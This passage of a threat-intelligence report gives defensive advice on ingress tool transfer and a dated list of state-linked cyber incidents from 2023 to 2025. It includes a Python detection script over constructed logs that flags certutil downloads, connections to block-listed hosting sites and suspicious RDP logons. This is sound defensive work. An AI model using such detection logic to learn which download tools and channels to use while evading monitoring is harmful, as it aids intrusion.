Adhere to a robust and frequent vulnerability assessment and patching cycle for all public-facing appliances. In case of a zero-day exploitation of a vulnerability, develop and maintain an emergency patch and mitigation plan.

T1105: Ingress Tool Transfer

This TTP allows attackers to import tools or files from an external source into a breached network. They might transfer these assets from a system they control to the target network either via the command-and-control (C2) channel or using other protocols like file transfer protocol (FTP). Once these tools or files are within the compromised environment, attackers can further distribute them across multiple devices within that network. For example, in the 2015 attack on Ukraine’s electric power facilities, the Sandworm Team, a Russian APT group, deployed additional malicious software onto already compromised systems to exfiltrate credentials, facilitate lateral movement, and ultimately destroy data. To defend against such tactics, organizations can implement the following processes.

Utilize application control solutions to help prevent threat actors from evading defenses through less-common methods of resource retrieval, such as downloading files via “certutil.”

Maintain an up-to-date block list of known hosting sites and actively monitor outbound request attempts through your forward proxy.

If an endpoint detection and response (EDR) solution is not available, leverage Sysmon Event ID 3 to log and monitor process executions generating network connections.
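An added detection example, not taken from the ReliaQuest report, that applies the host-based checks above to constructed log records: the T1021.001 guidance (service accounts and non-jump-box sources in interactive RDP logons, Windows Security event 4624 with LogonType 10) and the T1105 guidance (Sysmon Event ID 3 network connections made by certutil or to block-listed hosting sites). The domain, the “svc_” naming convention, the jump box address and the block list are assumptions made for the example.

```python
"""Detection rules for T1021.001 (RDP lateral movement) and T1105 (ingress tool
transfer) over constructed Windows Security 4624 and Sysmon Event ID 3 records."""
import ntpath

# --- Environment assumptions (constructed for this example) -----------------
DOMAIN_CONTROLLERS = {"dc01.corp.example", "dc02.corp.example"}
JUMP_HOSTS = {"10.10.9.5"}            # designated jump box(es) allowed to RDP to DCs
SERVICE_ACCOUNT_PREFIX = "svc_"       # assumed naming convention for service accounts
BLOCKED_HOSTS = {"paste.example-hosting.test"}   # known hosting sites on the block list
LOLBIN_DOWNLOADERS = {"certutil.exe"}  # built-in tool named in the guidance above
LOGON_TYPE_REMOTE_INTERACTIVE = 10    # Windows LogonType 10 = RemoteInteractive (RDP)

# --- Constructed sample telemetry (not real events) -------------------------
SAMPLE_EVENTS = [
    # 4624: service account logging on interactively over RDP to a DC
    {"source": "security", "EventID": 4624, "Computer": "DC01.corp.example",
     "TargetUserName": "svc_backup", "LogonType": 10, "IpAddress": "10.10.5.23"},
    # 4624: admin RDP to a DC from the jump box (expected, no alert)
    {"source": "security", "EventID": 4624, "Computer": "DC01.corp.example",
     "TargetUserName": "jdoe_adm", "LogonType": 10, "IpAddress": "10.10.9.5"},
    # 4624: admin RDP to a DC straight from a workstation (bypasses jump box)
    {"source": "security", "EventID": 4624, "Computer": "DC02.corp.example",
     "TargetUserName": "jdoe_adm", "LogonType": 10, "IpAddress": "10.10.5.44"},
    # 4624: service account network logon (LogonType 3) to a file server (normal)
    {"source": "security", "EventID": 4624, "Computer": "FS01.corp.example",
     "TargetUserName": "svc_backup", "LogonType": 3, "IpAddress": "10.10.5.23"},
    # Sysmon 3: certutil.exe opening an outbound connection to a host that is
    # NOT yet on the block list; the process-based rule still catches it
    {"source": "sysmon", "EventID": 3, "Computer": "WS042.corp.example",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "DestinationHostname": "files.example-hosting.test", "DestinationPort": 443},
    # Sysmon 3: browser connecting to a block-listed hosting site
    {"source": "sysmon", "EventID": 3, "Computer": "WS042.corp.example",
     "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "DestinationHostname": "paste.example-hosting.test", "DestinationPort": 443},
    # Sysmon 3: browser to the intranet portal (benign)
    {"source": "sysmon", "EventID": 3, "Computer": "WS042.corp.example",
     "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "DestinationHostname": "intranet.corp.example", "DestinationPort": 443},
]


def _alert(technique, reason, event, detail):
    """Build a uniform alert record from a matching event."""
    return {"technique": technique, "reason": reason,
            "host": event["Computer"], "detail": detail}


def detect_rdp_lateral_movement(events, dcs=DOMAIN_CONTROLLERS,
                                jump_hosts=JUMP_HOSTS):
    """T1021.001: flag interactive RDP logons by service accounts, and RDP
    logons to domain controllers that did not originate from a jump box."""
    alerts = []
    for e in events:
        if e.get("source") != "security" or e.get("EventID") != 4624:
            continue
        if e.get("LogonType") != LOGON_TYPE_REMOTE_INTERACTIVE:
            continue
        user, src = e["TargetUserName"], e["IpAddress"]
        detail = f"{user} from {src}"
        if user.lower().startswith(SERVICE_ACCOUNT_PREFIX):
            alerts.append(_alert("T1021.001",
                                 "service account used for interactive RDP logon",
                                 e, detail))
        elif e["Computer"].lower() in dcs and src not in jump_hosts:
            alerts.append(_alert("T1021.001",
                                 "RDP to domain controller not via jump box",
                                 e, detail))
    return alerts


def detect_ingress_tool_transfer(events, blocked_hosts=BLOCKED_HOSTS,
                                 lolbins=LOLBIN_DOWNLOADERS):
    """T1105: flag Sysmon Event ID 3 connections made by certutil-style
    downloaders, or by any process to a block-listed hosting site."""
    alerts = []
    for e in events:
        if e.get("source") != "sysmon" or e.get("EventID") != 3:
            continue
        image = ntpath.basename(e["Image"]).lower()   # handles Windows paths on any OS
        dest = e["DestinationHostname"].lower()
        detail = f"{image} -> {dest}:{e['DestinationPort']}"
        if image in lolbins:
            alerts.append(_alert("T1105", "LOLBin downloader made a network connection",
                                 e, detail))
        elif dest in blocked_hosts:
            alerts.append(_alert("T1105", "outbound connection to block-listed hosting site",
                                 e, detail))
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_lateral_movement(SAMPLE_EVENTS) + detect_ingress_tool_transfer(SAMPLE_EVENTS):
        print(a)
```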

Threat Forecast

In the short to medium term, Israeli-linked groups, motivated by a need to thwart Iran’s influence and nuclear prospects, will likely seek to continue cyber espionage and disruption efforts. Furthermore, the use of cyber mercenaries or loosely affiliated hacktivist groups such as Predatory Sparrow introduces further unpredictable elements into the conflict, making attribution and response more challenging. Similarly, Iranian APT and hacktivist groups are poised to intensify their cyber campaigns against Israeli interests, employing tactics aimed at espionage, sabotage, and propaganda spread. As both nations continue to invest heavily in cyber defense and offensive capabilities, the potential for a significant cyber incident remains elevated.

Given these conditions, it is important for organizations, especially those with business interests in the affected nations, to keep abreast of developments. Staying informed about geopolitical shifts and related cyber threats is key to customizing security measures effectively. Enhancing their cybersecurity posture will enable organizations to protect their assets and maintain operational continuity amidst regional instability.

What ReliaQuest Is Doing

The ReliaQuest Threat Research team is monitoring these threat groups, continuously refining our detection capabilities and hunting methodologies to identify and alert our customers about significant TTPs utilized by adversaries like the groups mentioned in this report. Our threat hunting team actively monitors our customers’ public-facing infrastructure for exposed and susceptible services (such as RDP) that are commonly abused by threat actors looking to gain initial access.

In addition to creating specific detection rules for each of the TTPs mentioned, ReliaQuest also provides intelligence updates and detailed threat profiles through the GreyMatter Intelligence content library, covering aspects like TTPs, indicators of compromise (IoCs), tools, and information on specific attacks and campaigns. The ReliaQuest threat intelligence team also regularly incorporates high-fidelity IoCs into our threat intelligence feeds to enhance detection capabilities.

Source: Reliaquest.com

Significant Cyber Incidents

May 2025: The Czech Republic attributed a cyberattack targeting its Foreign Ministry to China. While the incident occurred earlier, the attribution was made public this May.

May 2025: Russian hackers conducted an espionage campaign against educational, government, and research-related entities in Tajikistan. The hackers reportedly used an HTML application to implant file-based malware.

May 2025: A Turkish espionage group exploited a vulnerability in a messaging app to spy on Kurdish military forces operating in Iraq over the last year. The hackers used a zero-day bug in the applications to gain access to Kurdish military messages.

May 2025: The U.K.’s National Cyber Security Center named China as the dominant threat to national cybersecurity after a series of hacks and breaches involving British government departments and critical infrastructure, including alleged attacks against the Electoral Commission and Members of Parliament.

May 2025: The United States, Britain, France, Germany, and other allies issued an advisory warning of a Russian cyber campaign targeting the delivery of defense support to Ukraine and other NATO defense and tech sectors.

April 2025: Algeria-linked hackers launched a cyberattack against Morocco’s National Social Security Fund, leaking sensitive data online. The breach reportedly exposed personal and financial details for nearly two million people from roughly 500,000 companies.

April 2025: Hackers spied on the emails of roughly 103 U.S. bank regulators at the Office of the Comptroller of the Currency for over a year, ending in early 2025. The attackers gained access via a compromised administrator account, accessing roughly 150,000 emails containing highly sensitive financial institution data. The hacks have yet to be attributed.

April 2025: U.S. Cyber Command discovered Chinese malware implanted on partner networks in multiple Latin American nations during a series of ‘hunt forward’ operations, according to Lt. Gen. Dan Caine, Trump’s pick for chairman of the Joint Chiefs of Staff.

April 2025: North Korean cyber spies are expanding their infiltration operations to target European defense and government organizations. Hackers posed as remote workers to steal data, commit espionage, and generate revenue, increasingly using extortion against former employers after gaining access.

March 2025: Iranian hackers conducted ongoing cyber espionage campaigns against government entities in Iraq and telecommunications in Yemen. Attackers used custom backdoors and novel command-and-control methods like hijacked emails and backdoors to gain access.

March 2025: A network of front companies linked to a Chinese tech firm targeted recently laid-off U.S. federal workers using recruitment ads on job sites. The operation utilized fake consulting firms with non-functional contact details and addresses, mirroring methods identified by the FBI as potential foreign intelligence recruitment tactics.

February 2025: North Korean hackers conducted an espionage campaign against South Korean entities to exfiltrate system reconnaissance data from potentially thousands of machines. The attackers used PowerShell scripts and Dropbox for command and control and data exfiltration, demonstrating improved operational security by the attackers.

February 2025: Chinese cyber espionage operations surged by 150% overall in 2024, with attacks against financial, media, manufacturing, and industrial sectors rising up to 300%, according to new reporting.

February 2025: Chinese hackers conducted ongoing cyber espionage campaigns targeting government, manufacturing, telecom, and media sectors in Southeast Asia, Hong Kong, and Taiwan. The attackers deployed a backdoor and embedded themselves in cloud services like Dropbox for command and control to evade detection.

February 2025: Chinese reporting claims that foreign APTs launched over 1,300 cyberattacks targeting 14 key sectors in China during 2024. Government agencies, education, research, defense, and transportation sectors were most affected, with attackers aiming to steal sensitive data and potentially conduct strategic sabotage.

February 2025: North Korean hackers stole $1.5 billion in Ethereum from the Dubai-based exchange ByBit. Attackers exploited a vulnerability in third-party wallet software during a fund transfer, laundering at least $160 million within the first 48 hours of the attack. It is the largest cryptocurrency heist to date.

February 2025: Chinese cyber actors conducted a coordinated disinformation campaign on WeChat against Canadian Liberal leadership candidate Chrystia Freeland, according to Canada’s Security and Intelligence Threats to Elections Task Force. The operation involved numerous accounts spreading disparaging content linked to the PRC and reached 2 to 3 million global WeChat users.

January 2025: Suspected Russian hackers executed spearphishing attacks against Kazakh diplomatic entities. Attackers embedded malicious code within diplomatic documents, including one allegedly outlining an agreement between Germany and several Central Asian countries, for cyber espionage purposes.

January 2025: A pro-Russian hacking group claimed responsibility for a cyberattack targeting Italian government websites, including ministries, public services, and transportation platforms in cities like Rome and Palermo. The attack was reportedly a response to Italian Prime Minister Giorgia Meloni’s meeting with Ukrainian President Volodymyr Zelenskyy, where she reiterated support for Ukraine.

January 2025: Russian cyberattacks on Ukraine surged by nearly 70% in 2024, with 4,315 incidents targeting critical infrastructure, including government services, the energy sector, and defense-related entities. Ukraine’s cybersecurity agency reported that attackers aimed to steal sensitive data and disrupt operations, with tactics such as malware distribution, phishing, and account compromises.

January 2025: Cyberattacks on Taiwan by Chinese groups doubled to 2.4 million daily attempts in 2024, primarily targeting government systems and telecommunications firms, according to Taiwan’s National Security Bureau. Attackers aimed to steal sensitive data and disrupt critical infrastructure, with successful attacks rising by 20% compared to 2023.

December 2024: Chinese hackers breached a third-party vendor for the U.S. Treasury Department to gain access to over 3,000 unclassified files. The documents related to principals such as Secretary Janet Yellen, Deputy Secretary Wally Adeyemo, and Acting Under Secretary Brad Smith, in addition to the Committee on Foreign Investment in the United States and the Office of Foreign Assets Control.

December 2024: Russian hackers infiltrated a Pakistani hacking group, exploiting their infrastructure to access sensitive information stolen from South Asian government and military targets.

December 2024: Cyberattacks on Indian government entities increased by 138% between 2019 and 2023, rising from 85,797 incidents in 2019 to 204,844 in 2023, according to the Indian Ministry of Electronics and IT.

December 2024: Russian hackers targeted Romania’s election systems with over 85,000 cyberattacks and leaked credentials on Russian hacker forums. The attacks came just before Romania’s presidential vote, with attacks persisting through election day.

December 2024: Russian hackers launched a phishing campaign targeting Ukrainian armed forces and defense enterprises. The attackers deployed remote access tools to infiltrate military systems and steal credentials from platforms like Telegram and local networks.

December 2024: China’s national cybersecurity agency accused a U.S. intelligence agency of conducting cyberattacks on two Chinese tech firms since May 2023, targeting an advanced materials research unit and a high-tech company specializing in intelligent energy and digital information. The attacks reportedly led to the theft of substantial trade secrets, coinciding with heightened U.S.-China tensions over export controls on semiconductors and AI technologies.

November 2024: The United Kingdom’s National Cyber Security Center found a three-fold increase in the most significant cyberattacks compared to a year ago. NCSC provided support for 430 cyberattacks, 89 of which were “nationally significant,” and listed China, Russia, Iran, and North Korea as “real and enduring threats.”

November 2024: Chinese hackers, dubbed Salt Typhoon, breached at least eight U.S. telecommunications providers, as well as telecom providers in more than twenty other countries, as part of a wide-ranging espionage and intelligence collection campaign. Researchers believe the attack began up to two years ago and still infects telecom networks. Attackers stole customer call data and law enforcement surveillance request data and compromised private communications of individuals involved in government or political activity.

November 2024: Chinese spies planted a chip in a former U.S. three-star general’s conference name tag to track his every move during his time serving in the Indo-Pacific.

November 2024: Iranian hackers have been targeting aerospace, defense, and aviation industries in Israel, the UAE, Turkey, India, and Albania, according to Israeli reports. Hackers pose as recruiters on LinkedIn and distribute malware to victims through fake lucrative job offers to spy on targets and steal sensitive data starting in 2023. The malware and tactics are similar to those of a North Korean hacking group that targeted cryptocurrency exchange-traded funds.

November 2024: South Korean officials accused pro-Russian hackers of attacking civilian and government websites, following South Korea’s decision to monitor North Korean troops in Ukraine. Several pro-Russian hacktivists have claimed the attacks, but no final attribution has been made.

October 2024: Russian agents sent emails about bomb threats to nearly 60 Ukrainian embassies worldwide, as well as media outlets and state agencies.

October 2024: Iranian agents are increasing their espionage efforts against government agencies in the United Arab Emirates. Attackers deployed a backdoor to exfiltrate sensitive credentials.

October 2024: Russian cybercriminals sent information-stealing malware to an unknown number of Ukrainian draft-age men to undermine Ukraine’s military recruitment efforts.

October 2024: Australia introduced its first national cyber legislation, the Cyber Security Bill 2024. It is the country’s first attempt to codify security standards for ransomware reporting and smart devices and proposes a framework for managing the impact of significant cyber incidents.

October 2024: Chinese hackers have breached at least twenty Canadian government networks over the last four years, according to the Canadian Centre for Cyber Security (CCCS). CCCS reported that the objectives of the breaches include espionage, IP theft, malign influence, and transnational repression. The statement comes after CCCS revealed a Chinese threat actor was conducting surveillance scans of Canadian parliamentary and political networks.

October 2024: Russian hackers sent compromised emails disguised to appear as if they were sent from Amazon or Microsoft to infiltrate Ukrainian state and military devices and steal credentials from victims. The scope of the campaign is unknown.

October 2024: Chinese hackers hacked cellphones used by senior members of the Trump-Vance presidential campaign, including phones used by former President Donald Trump and JD Vance as well as people affiliated with the Harris-Walz campaign. It is unclear what data may have been accessed. The FBI is investigating the incident.

October 2024: New reporting reveals Chinese-backed hackers have been conducting large data exfiltration operations against Thailand’s government institutions. Hackers first gained access in 2023 through a brute force attack on a local area network before gaining privileged access and beginning data exfiltration.

October 2024: Ukrainian hackers attacked Russia’s state media company and electronic court document management system on Putin’s birthday. The attack prevented Russian courts from filing lawsuits or viewing court hearing schedules for several days, and it interrupted all streaming services of prominent TV and radio stations in Russia.

September 2024: Chinese hackers have been conducting an ongoing cyber espionage campaign against Middle Eastern government entities that published human rights studies related to the Israel-Hamas War. The campaign was discovered in June 2024 after researchers found malware implants designed to ultimately deliver a further malware implant.

September 2024: Russian cyber spies conducted an espionage campaign against Mongolia’s Ministry of Foreign Affairs and Cabinet websites. The spies added malicious code to the websites to exfiltrate a victim’s browser cookies. Attackers used the same exploits as those sold by commercial surveillance vendors such as NSO Group and Intellexa, but it is unknown if these companies knowingly sold their exploits to the Russian government, according to reports.

August 2024: U.S. government officials blamed Iranian hackers for breaking into Donald Trump’s presidential campaign. Hackers also attempted to break into the then-Biden-Harris campaign, then offered to share the stolen Trump campaign documents with the campaign, but were ignored. The attack comes as U.S. officials raise warnings about potential foreign interference in the upcoming U.S. election from Russia, China, Iran, and North Korea.

August 2024: The United Nations unanimously approved its first treaty on cybercrime. The treaty will face a General Assembly vote in the fall.

August 2024: Russian cyber criminals are deploying malware against diplomats through a used-car email scheme. The attackers embed a file supposedly containing images of a used car in their email, but the file contains backdoor malware that establishes persistent access for follow-on data theft, reconnaissance, and surveillance activities.

July 2024: South Korea’s military is investigating the leak of highly sensitive information on Seoul’s espionage activities and issued an arrest warrant for a suspect. The information included personal data on Seoul’s non-official agents conducting undercover espionage overseas. The information was transferred to the suspect’s personal laptop before being leaked. Lawmakers said the leak was first discovered in June and was not the result of a hack.

July 2024: A faulty software update for Microsoft Windows issued by cybersecurity firm CrowdStrike caused a global IT outage that disrupted airline and hospital operations. It affected approximately 8.5 million machines and cost Fortune 500 companies $5.4 billion, according to reports.

July 2024: Germany accused China of directing a “serious” cyberattack against Germany’s Federal Office for Cartography and Geodesy (BKG), which conducts precision mapping of the entire country, in 2021. The findings come at the end of a three-year investigation into the incident and as Germany plans a rip-and-replace project for Chinese telecommunications infrastructure in Germany over security concerns.

July 2024: Australia, the United States, Canada, the United Kingdom, Germany, Japan, South Korea, and New Zealand issued a warning about malicious Chinese state-sponsored cyber activity in their networks. It marked the first time South Korea and Japan joined with Australia to attribute malicious cyber actions to China, and the first time Australia led a cyber attribution effort against China.

June 2024: Japan’s space agency has suffered a series of cyberattacks since last year, according to the Japanese government. Japan’s Chief Cabinet Secretary claimed the targeted networks did not contain sensitive rocket or satellite information, and that the attackers were “from outside of Japan.”

June 2024: Hackers deployed ransomware in Indonesia’s national data center, which briefly disrupted a variety of immigration services, including immigration document management services at airports, and deleted information that was not backed up. The attack prompted Indonesia’s Director General of Informatics Applications at the Communications and Informatics Ministry to resign and initiated a nationwide audit of Indonesia’s national data centers.

June 2024: Belarusian state-sponsored hackers launched an espionage campaign against Ukraine’s Ministry of Defense and a Ukrainian military base. The attackers sent targets phishing emails with drone image files and a malicious Microsoft Excel spreadsheet.

June 2024: Germany’s main opposition party, the Christian Democratic Union, suffered a cyberattack just ahead of European Parliamentary elections. Germany’s interior ministry did not disclose the extent of the attack or the suspected perpetrator, but acknowledged it was “serious.” The attack occurred shortly after Germany’s Social Democratic party was attacked by Russian hackers. The party briefly took down parts of its IT service as a precaution.

June 2024: The government of Palau accused Chinese hackers of stealing over 20,000 government documents shortly after the island nation signed a 20-year economic and security deal with the United States in March 2024. Palau’s president said this was the first major attack on government records that the island has seen.

May 2024: A new report from Canada’s Communications Security Establishment detected Chinese espionage activity against eight members of Parliament and one senator starting in 2021. The spies likely attempted to obtain information from the targets’ personal and work devices but were unsuccessful, according to the report. The Parliamentarians were members of Canada’s Inter-Parliamentary Alliance on China, which focuses on how democracies should approach PRC-related issues. The report also mentioned this activity was similar to activity against 19 European countries dating back to 2020.

May 2024: Recent media reports stated Pakistani cyber spies deployed malware against India’s government, aerospace, and defense sectors. The group sent phishing emails masquerading as Indian defense officials to infect their targets’ devices and access sensitive information. The attack’s extent is unknown.

May 2024: Chinese hackers hit Britain’s Ministry of Defense with a cyberattack that exposed sensitive information on every troop apart from the UK’s special forces. The attackers targeted a third-party contractor to access names and bank details of current and former members of the armed forces. The UK Minister of Defence stopped short of publicly naming China as the culprit.

May 2024: Poland and the Czech Republic accused Russian cyber spies of targeting government and infrastructure networks. Both countries claim the attacks occurred around the same time Russian hackers attacked the German government. Hackers gained access by exploiting a Microsoft Outlook vulnerability, and the extent of the compromised data is currently unknown.

May 2024: Germany accused Russian hackers of breaking into the emails of Germany’s Social Democrats, the leading party in its governing coalition, and recalled its ambassador from the country. The campaign started in March 2022 when hackers exploited vulnerabilities in Microsoft Outlook to target the party’s executive committee, as well as German defense and aerospace companies.

April 2024: Ukraine’s military intelligence agency launched a cyberattack against Russia’s ruling United Russia party the same day Russia hosted its Victory Dictation. Attackers launched a barrage of DDoS attacks against United Russia’s servers, websites, and domains to make them inaccessible. United Russia publicly admitted to suffering from a “massive” DDoS attack.

April 2024: Belarusian pro-democracy hackers, known as the Belarusian Cyber-Partisans, crippled the website of Belarus’ main security service agency for over two months. The hackers also published a list of website administrators, its database, and server logs on its Telegram channel. This is the latest in a series of attacks against the Belarusian government by the group.

April 2024: Police in the United Kingdom are investigating a series of “honey trap” attacks against British MPs. Attackers sent explicit messages allegedly of themselves over WhatsApp to their target for the apparent purpose of acquiring compromising images of the target. The perpetrators of these attacks are currently unknown.

April 2024: Germany plans to create a cyber military branch as part of its military restructuring. Germany’s defense minister, Boris Pistorius, stated the new Cyber and Information Domain Service (CIR) would help deter increasing cyber aggression from Russia against Germany and its NATO allies.

April 2024: Hackers attacked El Salvador’s national cryptocurrency wallet Chivo and exposed over 144 GB of sensitive personal information of millions of Salvadorians. The hackers also released Chivo’s source code publicly. The Salvadorian government has not released an official public statement on the attack.

March 2024: A “massive” cyberattack disrupted the African Union’s systems for over a week and infected over 200 user devices, according to the deputy chair of the AU Commission. The cause of the cyberattack is unknown.

March 2024: Iranian hackers compromised an IT network connected to an Israeli nuclear facility. Hackers leaked sensitive facility documents but did not compromise its operational technology network.

March 2024: Russian hackers launched phishing attacks against German political parties. Hackers concealed ransomware in a fake dinner invitation from Germany’s Christian Democratic Union to install a backdoor in their victim’s computer.

March 2024: India’s government and energy sectors were breached in a cyber espionage campaign. Hackers sent a malicious file disguised as a letter from India’s Royal Air Force to offices responsible for India’s electronic communications, IT governance, and national defense. Researchers have not yet determined who conducted the attack.

March 2024: A U.S. Department of Justice indictment revealed Chinese hackers targeted several EU members of the Inter-Parliamentary Alliance on China and Italian MPs. The attack was designed to detect IP addresses and the targets’ locations.

March 2024: Canada pulled its financial intelligence system FINTRAC offline after a “cyber incident” by a currently unidentified attacker. FINTRAC claims the attack does not involve its intelligence or classified systems but declined to disclose further details of the incident.

March 2024: Russian hackers leaked an intercepted conversation between German military officials about the country’s support for Ukraine. In the call, the head of Germany’s Air Force discussed the possibility of supplying Taurus missiles to Ukraine and commented on German Chancellor Olaf Scholz’s hesitance to send the missiles. Germany announced it would investigate the incident and believes the leak was intended to inflame divisions in Germany.

March 2024: Switzerland’s National Cyber Security Centre (NCSC) confirmed that leaked data from a May 2023 breach included 65,000 documents from the Federal Administration. The documents contained sensitive personal data, classified information, and passwords, and were from Switzerland’s federal police, judiciary, and migration offices. Swiss officials had originally assessed that the breach only impacted non-government documents.

March 2024: Microsoft claims Russian hackers stole its source code and are continuing to gain unauthorized access to its internal systems as part of their November 2023 campaign to spy on senior Microsoft executives. Microsoft also said attackers increased the volume of their “password spray” attacks by nearly tenfold between January and February 2024. The company did not disclose further details on the source code access or breached internal systems.

February 2024: Russian hackers launched an espionage campaign against the embassies of Georgia, Poland, Ukraine, and Iran beginning in 2023. Hackers exploited a bug in a webmail server to inject malware into servers at the embassies and collect information on European and Iranian political and military activities.

February 2024: Roughly 190 megabytes of data from a Chinese cybersecurity company were exposed online, revealing the company’s espionage efforts on the governments of the United Kingdom, India, Indonesia, and Taiwan. The leak’s source is unknown.

February 2024: The Royal Canadian Mounted Police suffered a cyberattack against its networks. The RCMP stated it is investigating this “alarming” incident and does not believe it had an impact on its operations or the safety and security of Canadians. It is so far unclear who is behind the attack and if it was a data breach or security incident.

February 2024: U.S. officials hacked an Iranian military spy ship that was sharing intelligence with Houthi rebels who have been firing on ships in the Red Sea. According to U.S. officials, the attack was part of the Biden administration’s response to an Iranian drone strike that killed three U.S. soldiers in Jordan.

February 2024: A data breach of French health insurance companies in January 2024 affected 33 million French citizens, or nearly half the country’s population. The attack compromised sensitive birth date, social security, and marital status information, but not medical history. The French data protection agency opened an investigation to determine if the companies complied with cybersecurity guidelines under the EU’s General Data Protection Regulations.

February 2024: Chinese spies placed malware in a Dutch military network in 2023. The network was not connected to the defense ministry’s main network, which reduced the damage. This is the first time the Netherlands has publicly accused China of cyber espionage.

January 2024: Hackers breached Global Affairs Canada’s secure VPN in December 2023, allowing hackers to access sensitive personal information of users and employees. It affected staff emails, calendars, and contacts. It’s unclear if classified information was compromised or lost. The hacker’s identity is currently unknown.

January 2024: Russian hackers launched a ransomware attack against Sweden’s only digital service provider for government services. The attack affected operations for 120 government offices and came as Sweden prepared to join NATO. Sweden expects disruptions to continue for several weeks.

January 2024: Microsoft announced that Russian hackers broke into its corporate systems. Hackers used a “password spray attack” to steal emails and documents from accounts of Microsoft’s senior leadership, cybersecurity, and legal teams back in November 2023.

January 2024: Russian hackers attacked 65 Australian government departments and agencies and stole 2.5 million documents in Australia’s largest government cyberattack. Hackers infiltrated an Australian law firm that worked with the government to gain access to government files.

January 2024: The Australian government identified and sanctioned Aleksandr Ermakov as the Russian hacker who breached Medibank, the country’s largest private health insurance provider, in 2022. He stole information from 9.7 million current and former Medibank customers. This is the first time Australia has issued cyber sanctions against an individual since the framework was established in 2021. The U.S. and UK also sanctioned Ermakov.

January 2024: Russian agents hacked residential webcams in Kyiv to gather information on the city’s air defense systems before launching a missile attack on Kyiv. Hackers changed the cameras’ angles to gather information on nearby critical infrastructure facilities and stream the footage on YouTube. Ukraine has since ordered webcam operators in the country to stop live broadcasts.

December 2023: Israeli-linked hackers disrupted approximately 70% of gas stations in Iran. Hackers claimed the attack was in retaliation for aggressive actions by Iran and its proxies in the region. Pumps restored operation the next day, but payment issues continued for several days.

December 2023: Ukrainian state hackers crippled Russia’s largest water utility plant by encrypting over 6,000 computers and deleting over 50 TB of data. Hackers claimed their attack was in retaliation for the Russian Kyivstar cyberattack.

December 2023: Russian hackers hit Ukraine’s largest mobile phone provider, Kyivstar, disabling access to its 24 million customers in Ukraine. Hackers claim to have destroyed more than 10,000 computers and 4,000 servers, including cloud storage and backup systems. The attack began hours before President Zelenskyy met with President Biden in Washington D.C.

December 2023: Ukraine’s military intelligence service (the GRU) claims to have disabled Russia’s tax service in a cyberattack. According to the GRU, the attack destroyed the system’s configuration files, databases, and their backups, paralyzing Russia’s tax service.

November 2023: Suspected Chinese hackers launched an espionage campaign against Uzbekistan and the Republic of Korea. Hackers used phishing campaigns to gain access to their targets’ systems and decrypt their information.

November 2023: Chinese-linked hackers attacked Japan’s space agency during summer 2023 and compromised the organization’s directory. The agency shut down parts of its network to investigate the breach’s scope, but claims it did not compromise critical rocket and satellite operations information.

November 2023: Chinese hackers compromised Philippine government networks. Beginning in August 2023, hackers used phishing emails to embed malicious code into their targets’ systems to establish command-and-control and spy on their targets’ activities.

November 2023: Trinidad and Tobago’s Prime Minister Dr. Keith Rowley declared the latest ransomware attack against the country’s telecommunications service to be a “national security threat.” Hackers stole an estimated six gigabytes of data, including email addresses, national ID numbers, and phone numbers.

November 2023: Denmark suffered its largest cyberattack on record when Russian hackers hit twenty-two Danish power companies. The attack began in May 2023 and appeared to be aimed at gaining comprehensive access to Denmark’s decentralized power grid. Hackers exploited a critical command injection flaw and continued to exploit unpatched systems to maintain access.

November 2023: Chinese cybercriminals targeted at least 24 Cambodian government networks, including the National Defense, Election Oversight, Human Rights, National Treasury, Finance, Commerce, Politics, Natural Resources and Telecommunications agencies. Hackers disguised themselves as cloud storage services to mask their data exfiltration. Initial research indicates the attack is part of a broader Chinese espionage campaign.

October 2023: Hacktivists stole 3,000 documents from NATO, the second time in three months that hacktivists have breached NATO’s cybersecurity defenses. Hackers described themselves as “gay furry hackers” and announced their attack was retaliation against NATO countries’ human rights abuses. NATO alleges the attack did not impact NATO missions, operations, or military deployments.

October 2023: Researchers discovered what appears to be a state-sponsored software tool designed for espionage purposes and used against ASEAN governments and organizations.

October 2023: Pro-Hamas and pro-Israeli hacktivists have launched multiple cyberattacks against Israeli government sites and Hamas web pages in the aftermath of Hamas’ attacks on Israel on October 7th. Russian and Iranian hacktivists also targeted Israeli government sites, and Indian hacktivists have attacked Hamas websites in support of Israel.

October 2023: Vietnamese hackers attempted to install spyware on the phones of journalists, United Nations officials, and the chairs of the House Foreign Affairs Committee and Senate Homeland Security and Governmental Affairs. The spyware was designed to siphon calls and texts from infected phones, and the unsuccessful deployment came while Vietnamese and American diplomats were negotiating an agreement to counter China’s growing influence in the region.

October 2023: New reporting reveals Chinese hackers have been targeting Guyana government agencies with phishing emails to exfiltrate sensitive information since February 2023.

October 2023: North Korean hackers sent malware phishing emails to employees of South Korea’s shipbuilding sector. South Korea’s National Intelligence Service suggested that the attacks were intended to gather key naval intelligence that could help North Korea build larger ships.

September 2023: Indian hacktivists targeted Canada’s military and Parliament websites with DDoS attacks that slowed system operations for several hours. Hacktivists referenced Canadian Prime Minister Justin Trudeau’s public accusation against India of killing Sikh independence activist Hardeep Singh Nijjar as motivation for the hack.

September 2023: Iranian hackers launched a cyberattack against Israel’s railroad network. The hackers used a phishing campaign to target the network’s electrical infrastructure. Brazilian and UAE companies were also reportedly targeted in the same attack.

September 2023: U.S. and Japanese officials warn that Chinese state-sponsored hackers placed modifying software inside routers to target government industries and companies located in both countries. The hackers use firmware implants to stay hidden and move around in their target’s networks. China has denied the allegations.

September 2023: A massive cyberattack hit Bermuda’s Department of Planning and other government services. The country’s hospitals, transportation, and education centers remained functional, but other services were down for several weeks. Bermuda announced that it is investigating the attack and declined to state if any sensitive data was compromised.

September 2023: Cybercriminals targeted Kuwait’s Ministry of Finance with a phishing ransomware attack. Kuwait isolated the Ministry and other government systems to protect them from potential further attacks.

September 2023: Russia is stepping up cyberattacks against Ukrainian law enforcement agencies, specifically units collecting and analyzing evidence of Russian war crimes, according to Ukrainian officials. Russian cyberattacks have primarily targeted Ukrainian infrastructure for most of the war.

September 2023: Russian forces in occupied Crimea reported a cyberattack on Crimean Internet providers. The attack happened around the same time as a Ukrainian missile strike on Russian naval headquarters in the area. Ukrainian officials have yet to comment.

September 2023: Russian cybercriminals breached the International Criminal Court’s IT systems amid an ongoing probe into Russian war crimes committed in Ukraine.

September 2023: A new Microsoft report indicates an increase of Chinese cyber operations in the South China Sea, as well as increased attacks against the U.S. defense industrial base and U.S. critical infrastructure. The increase comes amid rising tensions between China and the U.S.

